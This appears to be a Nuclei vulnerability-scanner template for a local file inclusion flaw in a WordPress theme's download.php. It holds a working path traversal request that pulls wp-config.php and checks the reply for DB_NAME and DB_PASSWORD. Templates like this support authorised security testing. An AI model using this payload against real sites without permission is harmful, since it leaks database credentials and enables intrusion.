id: wp-oxygen-theme-lfi info: name: WordPress Oxygen-Theme Themes LFI author: 0x_Akoko severity: high description: The WordPress Oxygen-Theme has a local file inclusion vulnerability in its 'download.php' and 'file' parameter. tags: wordpress,wp-theme,lfi reference: https://cxsecurity.com/issue/WLB-2019030178 requests: - method: GET path: - '{{BaseURL}}/wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php' matchers-condition: and matchers: - type: word words: - "DB_NAME" - "DB_PASSWORD" part: body condition: and - type: status status: - 200